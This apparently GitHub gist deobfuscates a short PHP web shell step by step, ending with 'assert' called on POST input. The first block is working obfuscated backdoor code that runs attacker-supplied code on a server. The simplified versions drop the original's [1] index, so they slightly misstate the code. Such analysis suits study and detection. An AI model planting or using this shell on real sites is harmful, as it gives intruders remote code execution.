Skip to content

Instantly share code, notes, and snippets.

@0xa
Last active August 29, 2015 14:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 0xa/c030aac09f8f85765ffd to your computer and use it in GitHub Desktop.
Save 0xa/c030aac09f8f85765ffd to your computer and use it in GitHub Desktop.
Wat.
<?php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/1/*-/*-*//*-/*-*//*-/*-*//*-/*-*//*-/*-*/]);
?>
Removed comments:
<?php
@$_="s"."s"."e"."r";
@$_="a".$_."t";
@$_(${"_P"."OS"."T"});
?>
Concatenations:
<?php
@$_="assert";
@$_(${"_POST"});
?>
Clear:
<?php
assert($_POST)
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment